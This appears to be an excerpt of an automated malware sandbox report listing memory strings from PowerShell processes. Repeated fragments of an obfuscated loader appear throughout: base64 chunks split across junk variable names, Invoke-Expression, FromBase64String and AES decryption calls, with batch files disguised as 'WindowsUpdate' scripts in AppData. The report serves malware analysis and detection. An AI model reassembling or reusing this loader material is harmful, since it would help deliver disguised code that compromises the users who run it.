pHMXBiaUlLSkhKbqduj=CQygkbnVsbCwgJHBhcmFtqfek=NhQUJDc0FCQ2VBQkM2QUJqghb=BQkN0QUJDJy5SZXBsYWNlqhim=2dHNwc3VuZWJlaXRteXNsqjzl=FoxWmhiSFZsSUQwZ01Bb0qkbh=LQ2dwQlpHUXRWMmx1Wkc5qmne=JGRucWVsLlNwbGl0KCdcJqrcx=QUtFUElBZDhJSEtxVHFzcqskq=bSgsJHBhcmFtX3Zhcik7Jqvaa=oke-Expression"qwjl=LlNlY3VyaXR5LkNyeXB0bqziz=tVnVkRlpsY25OcGIyNWNVrhmj=kNyZUFCQ3NzKTsnLlJlcGrjzk=ldkV1lXeDFaUW9LVjNKcGrkeo=Zhci5DcmVhdGVEZWNyeXBrlle=FCQ2VBQkNtQUJDb0FCQ3Jrlvj=ycuUmVwbGFjZSgnQUJDJyrouy=Ba2NHRjBhQW9nSUNBZ0lDrtfh=R1emN4aGtncmtrcnlyaGsrwav=helsaod=UoKTsJJGFlc192YXIuRGlsbco=aWJlcmJlaXV4YW9mcmdvIscbh=2dyYXBoeS5DaXBoZXJNb2scmr=dWx3dmRhPU5ldy1PYmplYsefj=3Rpb24geWxjZnhmZXRkd2SESSIONNAME=Consolesmch=dGVtLlNlY3VyaXR5LkNyesobo=dNb2RlXTo6UEtDUzc7CSRsofe=Fnc1sxXSkpKTsnLlJlcGxsorn=VSEp2YlhCMFFtVm9ZWFpwsourceFile=C:\Users\user\AppData\Roaming\WindowsUpdate_394.batsptn=uamlzcXlqemRqaWx6bGIusqkw=nFocnd4YXJyd3VvbXp0dWsrid=AnJyk7CUlFWCAnJHFiampsupy=JJGdubmJyYWR5dXp6YWljsvpj=pDcmVhdGUoKTsJJGFlc19swld=hY2UoJ0FCQycsICcnKTtxSystemDrive=C:SystemRoot=C:\Windowsszhf=0JobTZKNmZQaEJwSnBSY3tbfd=mJ4cnl1dnR6c29lY3ZmcWtctb=owsteci=QUJDZUFCQ2FBQkNtQUJDOTEMP=C:\Users\user\AppData\Local\Temptghr=SUNBZ0lDTWdRV1JwWTJsdtimle=settmfd=4\WTMP=C:\Users\user\AppData\Local\Temptmtn=G9zZSgpOwkkYndqdnBhantqlo=Hl4cikgewlpZiAoJHlkYStqyn=d0eGVUbGxBZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dXB2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwmz=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert]::FromBase6Xoal=1 xowp=KCdBQkMnLCAnJyk7JGhvcxtop=3RlbS5JTy5GaWxlXTo6KCxvcu=xudHJ4Yndta3pmbHFwa3Nxxpa=weryawo=ZW0uU2VjdXJpdHkuQ3J5cyetv=l\vyfpq=2piZnpvd2J1LkFCQ0VBQkygue=uLi0xMV0gLWpvaW4gJycpyhah=93VGl0bGUgPSAkbWxxeGdyikg=E2XSAtam9pbiAnJykoJ0lyjga=GMGFDQXRSbTl5WTJVS2ZRynqa=FhbHZpd3Jmb2JyeHl2PSRyntz=4String('SUVYKFtUZXh0yomp=IzUmpiMjUwWVdsdWN5QWtyqwqm=tysou=b3FpdGxhaWJtY2tlY3F0eytjh=zZFhQRHRXVnpDaUFnSUNByyhb=EdWdElnb2tjbVZuVG1GdFyznr=mJtRWdieUJ
                  Source: powershell.exe, 00000004.00000002.2289800081.0000012971335000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2289800081.0000012971385000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 0000001E.00000002.2749047487.00000000031D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ata=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXptuh=zQUJDaW9BQkNuLkFCQ0daPUBLIC=C:\Users\Publicpwcs=gKCxbc3RyaW5nW11dICgnpzxb=hqYkhWemFXOXVVR0YwYUNpzyu=aWx6bGI9TmV3LU9iamVjdqceh=2tiZ3puICh5bGNmeGZldGqcfb=YjNKQlpHMXBiaUlLSkhKbqduj=CQygkbnVsbCwgJHBhcmFtqfek=NhQUJDc0FCQ2VBQkM2QUJqghb=BQkN0QUJDJy5SZXBsYWNlqhim=2dHNwc3VuZWJlaXRteXNsqjzl=FoxWmhiSFZsSUQwZ01Bb0qkbh=LQ2dwQlpHUXRWMmx1Wkc5qmne=JGRucWVsLlNwbGl0KCdcJqrcx=QUtFUElBZDhJSEtxVHFzcqskq=bSgsJHBhcmFtX3Zhcik7Jqvaa=oke-Expression"qwjl=LlNlY3VyaXR5LkNyeXB0bqziz=tVnVkRlpsY25OcGIyNWNVrhmj=kNyZUFCQ3NzKTsnLlJlcGrjzk=ldkV1lXeDFaUW9LVjNKcGrkeo=Zhci5DcmVhdGVEZWNyeXBrlle=FCQ2VBQkNtQUJDb0FCQ3Jrlvj=ycuUmVwbGFjZSgnQUJDJyrouy=Ba2NHRjBhQW9nSUNBZ0lDrtfh=R1emN4aGtncmtrcnlyaGsrwav=helsaod=UoKTsJJGFlc192YXIuRGlsbco=aWJlcmJlaXV4YW9mcmdvIscbh=2dyYXBoeS5DaXBoZXJNb2scmr=dWx3dmRhPU5ldy1PYmplYsefj=3Rpb24geWxjZnhmZXRkd2SESSIONNAME=Consolesmch=dGVtLlNlY3VyaXR5LkNyesobo=dNb2RlXTo6UEtDUzc7CSRsofe=Fnc1sxXSkpKTsnLlJlcGxsorn=VSEp2YlhCMFFtVm9ZWFpwsourceFile=C:\Users\user\AppData\Roaming\WindowsUpdate_706.batsptn=uamlzcXlqemRqaWx6bGIusqkw=nFocnd4YXJyd3VvbXp0dWsrid=AnJyk7CUlFWCAnJHFiampsupy=JJGdubmJyYWR5dXp6YWljsvpj=pDcmVhdGUoKTsJJGFlc19swld=hY2UoJ0FCQycsICcnKTtxSystemDrive=C:SystemRoot=C:\Windowsszhf=0JobTZKNmZQaEJwSnBSY3tbfd=mJ4cnl1dnR6c29lY3ZmcWtctb=owsteci=QUJDZUFCQ2FBQkNtQUJDOTEMP=C:\Users\user\AppData\Local\Temptghr=SUNBZ0lDTWdRV1JwWTJsdtimle=settmfd=4\WTMP=C:\Users\user\AppData\Local\Temptmtn=G9zZSgpOwkkYndqdnBhantqlo=Hl4cikgewlpZiAoJHlkYStqyn=d0eGVUbGxBZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dXB2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwmz=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert
                  Source: powershell.exe, 0000002B.00000002.2838430930.00000000031A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ata=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXptuh=zQUJDaW9BQkNuLkFCQ0daPUBLIC=C:\Users\Publicpwcs=gKCxbc3RyaW5nW11dICgnpzxb=hqYkhWemFXOXVVR0YwYUNpzyu=aWx6bGI9TmV3LU9iamVjdqceh=2tiZ3puICh5bGNmeGZldGqcfb=YjNKQlpHMXBiaUlLSkhKbqduj=CQygkbnVsbCwgJHBhcmFtqfek=NhQUJDc0FCQ2VBQkM2QUJqghb=BQkN0QUJDJy5SZXBsYWNlqhim=2dHNwc3VuZWJlaXRteXNsqjzl=FoxWmhiSFZsSUQwZ01Bb0qkbh=LQ2dwQlpHUXRWMmx1Wkc5qmne=JGRucWVsLlNwbGl0KCdcJqrcx=QUtFUElBZDhJSEtxVHFzcqskq=bSgsJHBhcmFtX3Zhcik7Jqvaa=oke-Expression"qwjl=LlNlY3VyaXR5LkNyeXB0bqziz=tVnVkRlpsY25OcGIyNWNVrhmj=kNyZUFCQ3NzKTsnLlJlcGrjzk=ldkV1lXeDFaUW9LVjNKcGrkeo=Zhci5DcmVhdGVEZWNyeXBrlle=FCQ2VBQkNtQUJDb0FCQ3Jrlvj=ycuUmVwbGFjZSgnQUJDJyrouy=Ba2NHRjBhQW9nSUNBZ0lDrtfh=R1emN4aGtncmtrcnlyaGsrwav=helsaod=UoKTsJJGFlc192YXIuRGlsbco=aWJlcmJlaXV4YW9mcmdvIscbh=2dyYXBoeS5DaXBoZXJNb2scmr=dWx3dmRhPU5ldy1PYmplYsefj=3Rpb24geWxjZnhmZXRkd2SESSIONNAME=Consolesmch=dGVtLlNlY3VyaXR5LkNyesobo=dNb2RlXTo6UEtDUzc7CSRsofe=Fnc1sxXSkpKTsnLlJlcGxsorn=VSEp2YlhCMFFtVm9ZWFpwsourceFile=C:\Users\user\AppData\Roaming\WindowsUpdate_394.batsptn=uamlzcXlqemRqaWx6bGIusqkw=nFocnd4YXJyd3VvbXp0dWsrid=AnJyk7CUlFWCAnJHFiampsupy=JJGdubmJyYWR5dXp6YWljsvpj=pDcmVhdGUoKTsJJGFlc19swld=hY2UoJ0FCQycsICcnKTtxSystemDrive=C:SystemRoot=C:\Windowsszhf=0JobTZKNmZQaEJwSnBSY3tbfd=mJ4cnl1dnR6c29lY3ZmcWtctb=owsteci=QUJDZUFCQ2FBQkNtQUJDOTEMP=C:\Users\user\AppData\Local\Temptghr=SUNBZ0lDTWdRV1JwWTJsdtimle=settmfd=4\WTMP=C:\Users\user\AppData\Local\Temptmtn=G9zZSgpOwkkYndqdnBhantqlo=Hl4cikgewlpZiAoJHlkYStqyn=d0eGVUbGxBZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dXB2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwmz=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert
                  Source: powershell.exe, 0000002B.00000002.2829344708.0000000002F8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wsourceFile=C:\Users\user\AppData\Roaming\WindowsUpdate_394.batsptn=uamlzcXlqemRqaWx6bGIusqkw=nFocnd4YXJyd3VvbXp0dWsrid=AnJyk7CUlFWCAnJHFiampsupy=JJGdubmJyYWR5dXp6YWljsvpj=pDcmVhdGUoKTsJJGFlc19swld=hY2UoJ0FCQycsICcnKTtxSystemDrive=C:SystemRoot=C:\Windowsszhf=0JobTZKNmZQaEJwSnBSY3tbfd=mJ4cnl1dnR6c29lY3ZmcWtctb=owsteci=QUJDZUFCQ2FBQkNtQUJDOTEMP=C:\Users\user\AppData\Local\Temptghr=SUNBZ0lDTWdRV1JwWTJsdtimle=settmfd=4\WTMP=C:\Users\user\AppData\Local\Temptmtn=G9zZSgpOwkkYndqdnBhantqlo=Hl4cikgewlpZiAoJHlkYStqyn=d0eGVUbGxBZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dXB2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwmz=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert]::FromBase6Xoal=1 xowp=KCdBQkMnLCAnJyk7JGhvcxtop=3RlbS5JTy5GaWxlXTo6KCxvcu=xudHJ4Yndta3pmbHFwa3Nxxpa=weryawo=ZW0uU2VjdXJpdHkuQ3J5cyetv=l\vyfpq=2piZnpvd2J1LkFCQ0VBQkygue=uLi0xMV0gLWpvaW4gJycpyhah=93VGl0bGUgPSAkbWxxeGdyikg=E2XSAtam9pbiAnJykoJ0lyjga=GMGFDQXRSbTl5WTJVS2ZRynqa=FhbHZpd3Jmb2JyeHl2PSRyntz=4String('SUVYKFtUZXh0yomp=IzUmpiMjUwWVdsdWN5QWtyqwqm=tysou=b3FpdGxhaWJtY2tlY3F0eytjh=zZFhQRHRXVnpDaUFnSUNByyhb=EdWdElnb2tjbVZuVG1GdFyznr=mJtRWdieUJrYVhKbGRNT3zaeq=hci5QYWRkaW5nPVtTeXN0zdpt=3QuVUkuUmF3VUkuV2luZGzgtb=21aMWJtTjBhVzl1SUVGa1zkdn=BJQ0pET2lCQlpHUmxaQzRzljz=JDdkFCQ29BQkNrQUJDZUFzluh=tDb252ZXJ0XTo6KCdnbmlzlzd=aVzVrWlhKRmVHTnNkWE5wzpvk=NvbUFCQ3ByQUJDZUFCQ3Nztbw=jbnFwICRudWxsO3FtYWluzudf=Q2drWlhocGMzUnBibWRGZzybz=CQ3lBQkNdOjpMQUJDb0FC
                  Source: powershell.exe, 0000001E.00000002.2835061496.00000000096F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RyaW5nW11dICgnpzxb=hqYkhWemFXOXVVR0YwYUNpzyu=aWx6bGI9TmV3LU9iamVjdqceh=2tiZ3puICh5bGNmeGZldGqcfb=YjNKQlpHMXBiaUlLSkhKbqduj=CQygkbnVsbCwgJHBhcmFtqfek=NhQUJDc0FCQ2VBQkM2QUJqghb=BQkN0QUJDJy5SZXBsYWNlqhim=2dHNwc3VuZWJlaXRteXNsqjzl=FoxWmhiSFZsSUQwZ01Bb0qkbh=LQ2dwQlpHUXRWMmx1Wkc5qmne=JGRucWVsLlNwbGl0KCdcJqrcx=QUtFUElBZDhJSEtxVHFzcqskq=bSgsJHBhcmFtX3Zhcik7Jqvaa=oke-Expression"qwjl=LlNlY3VyaXR5LkNyeXB0bqziz=tVnVkRlpsY25OcGIyNWNVrhmj=kNyZUFCQ3NzKTsnLlJlcGrjzk=ldkV1lXeDFaUW9LVjNKcGrkeo=Zhci5DcmVhdGVEZWNyeXBrlle=FCQ2VBQkNtQUJDb0FCQ3Jrlvj=ycuUmVwbGFjZSgnQUJDJyrouy=Ba2NHRjBhQW9nSUNBZ0lDrtfh=R1emN4aGtncmtrcnlyaGsrwav=helsaod=UoKTsJJGFlc192YXIuRGlsbco=aWJlcmJlaXV4YW9mcmdvIscbh=2dyYXBoeS5DaXBoZXJNb2scmr=dWx3dmRhPU5ldy1PYmplYsefj=3Rpb24geWxjZnhmZXRkd2SESSIONNAME=Consolesmch=dGVtLlNlY3VyaXR5LkNyesobo=dNb2RlXTo6UEtDUzc7CSRsofe=Fnc1sxXSkpKTsnLlJlcGxsorn=VSEp2YlhCMFFtVm9ZWFpwsourceFile=C:\Users\user\AppData\Roaming\WindowsUpdate_706.batsptn=uamlzcXlqemRqaWx6bGIusqkw=nFocnd4YXJyd3VvbXp0dWsrid=AnJyk7CUlFWCAnJHFiampsupy=JJGdubmJyYWR5dXp6YWljsvpj=pDcmVhdGUoKTsJJGFlc19swld=hY2UoJ0FCQycsICcnKTtxSystemDrive=C:SystemRoot=C:\Windowsszhf=0JobTZKNmZQaEJwSnBSY3tbfd=mJ4cnl1dnR6c29lY3ZmcWtctb=owsteci=QUJDZUFCQ2FBQkNtQUJDOTEMP=C:\Users\user\AppData\Local\Temptghr=SUNBZ0lDTWdRV1JwWTJsdtimle=settmfd=4\WTMP=C:\Users\user\AppData\Local\Temptmtn=G9zZSgpOwkkYndqdnBhantqlo=Hl4cikgewlpZiAoJHlkYStqyn=d0eGVUbGxBZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dXB2bmppc3F5aulfn=pQWtjR0YwYUNJS0lDQWdJunjd=ycuUmVwbGFjZSgnQUJDJyupkq=3Zmx1djE0TFVqSG9zU0druqlf=dE1UVHBjVTA5R1ZGZEJVaurch=52bmh0dG9jd3NuenhlY25urxt=\poUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userusof=Powuswd=cXpqZ291bHd2ZGEuRGlzcutxq=iYnhyeXV2dHpzb2VjdmZxuuaw=wYXJhbV92YXIsJHBhcmFtuvhb=yk7SUVYICckcHpvY2V4eWuwlb=KbFoxQmhkR2dnUFNBaVNFuwmz=HdsaHhwcHJuICRwem9jZXuwnv=VGV4dC5FbmNvZGluZ106Ouxex="C:\uyxg=ykoJ2FXVjRJQ2hKYm5admuzty=Ml92YXIpewkJSUVYICckbuzyd=KCRtbHF4Z2JieHJ5dXZ0evbjq=RwYXJhbV92YXIpewlJRVgvecd=s\Svenu=Lkxlbmd0aCk7CSRkZWNyevftw=N1bmViZWl0bXlzbHNnamhvfui=dGVtLkNvbnZlcnRdOjooJvipj=kNvbkFCQy5Db0FCQ21wQUvlpe=CsgJ0FCQ1xBQkNkQUJDd0vozg=DNEFCQ1NBQkN0ckFCQ2lBvrrg=BnUjJWMExVMXdVSEpsWm1vumn=aXl6dDskdWR5eHI9W1N5cvyry=exewavh=WeVpXNWpaU0I4SUZObGJHwbzx=WdJQ0JPWlhjdFNYUmxiU0wccr=xcD1pYnB4Z21oanR3a2Jnwindir=C:\Windowswjzdo=swkoy=a2h2ZW90eXZhc2xiPU5ldwlmx=IC1TZWNvbmRzIDU7ZnVuYwpss=F0VUdGMGFDQWtjbVZuVUdwrvj=2ZXNhQm1vckYnWy0xLi4twzpx=1.0wzrp=ppc3F5anpkamlsemxiKTsxgbo=h6aHJvaHdsaHhwcHJuKCRxgqz=bW14bnpheHpocm9od2xoexlwe=([Convert]::FromBase6Xoal=1 xowp=KCdBQkMnLCAnJyk7JGhvcxtop=3RlbS5JTy5GaWxlXTo6KCxvcu=xudHJ4Yndta3pmbHFwa3Nxxpa=weryawo=ZW0uU2VjdXJpdHkuQ3J5cyetv=l\vyfpq=2piZnpvd2J1LkFCQ0VBQkygue=uLi0xMV0gLWpvaW4gJycpyhah=93VGl0bGUgPSAkbWxxeGdyikg=E2XSAtam9pbiAnJykoJ0lyjga=GMGFDQXRSbTl5WTJVS2ZRynqa=FhbHZpd3Jmb2JyeHl2PSRyntz=4String('SUVYKFtUZXh0yomp=IzUmpiMjUwWVdsdWN5
                  Source: powershell.exe, 00000016.00000002.2806054422.000000000804C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 0000000D.00000002.3635023745.0000000006B36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.000000000639D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.0000000006976000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.0000000006636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.00000000067B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.00000000064ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: kKP/aB55fYI8X0hGfs50TvgZAINv7maZKLIQBUWG02dI0BIxLDjCklFJQhGLBZIwQtr1
                  Source: powershell.exe, 0000000D.00000002.3719703937.00000000083F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPp
                  Source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rjzk=ldkV1lXeDFaUW9LVjNKcGrkeo=Zhci5DcmVhdGVEZWNyeXBrlle=FCQ2VBQkNtQUJDb0FCQ3Jrlvj=ycuUmVwbGFjZSgnQUJDJyrouy=Ba2NHRjBhQW9nSUNBZ0lDrtfh=R1emN4aGtncmtrcnlyaGsrwav=helsaod=UoKTsJJGFlc192YXIuRGlsbco=aWJlcmJlaXV4YW9mcmdvIscbh=2dyYXBoeS5DaXBoZXJNb2scmr=dWx3dmRhPU5ldy1PYmplYsefj=3Rpb24geWxjZnhmZXRkd2SESSIONNAME=Consolesmch=dGVtLlNlY3VyaXR5LkNyesobo=dNb2RlXTo6UEtDUzc7CSRsofe=Fnc1sxXSkpKTsnLlJlcGxsorn=VSEp2YlhCMFFtVm9ZWFpwsourceFile=C:\Users\user\AppData\Roaming\WindowsUpdate_394.batsptn=uamlzcXlqemRqaWx6bGIusqkw=nFocnd4YXJyd3VvbXp0dWsrid=AnJyk7CUlFWCAnJHFiampsupy=JJGdubmJyYWR5dXp6YWljsvpj=pDcmVhdGUoKTsJJGFlc19swld=hY2UoJ0FCQycsICcnKTtxSystemDrive=C:SystemRoot=C:\Windowsszhf=0JobTZKNmZQaEJwSnBSY3tbfd=mJ4cnl1dnR6c29lY3ZmcWtctb=owsteci=QUJDZUFCQ2FBQkNtQUJDOTEMP=C:\Users\user\AppData\Local\Temptghr=SUNBZ0lDTWdRV1JwWTJsdtimle=settmfd=4\WTMP=C:\Users\user\AppData\Local\Temptmtn=G9zZSgpOwkkYndqdnBhantqlo=Hl4cikgewlpZiAoJHlkYStqyn=d0eGVUbGxBZGFlUidbLTEtuvk=VWlhOMExWQmhkR2dnSkhKtwnj=xjeTRpQ2lBZ0lDQjlDbjBtwxu=mViZWl0bXlzbHNnamhqemucwz=pKQl7CQkkZG5xZWw9JHlkudtd=npkamlsemxiLkRpc3Bvc2uidy=bWFpbm1teG56YXh6aHJvauksh=YmpqbmR4dX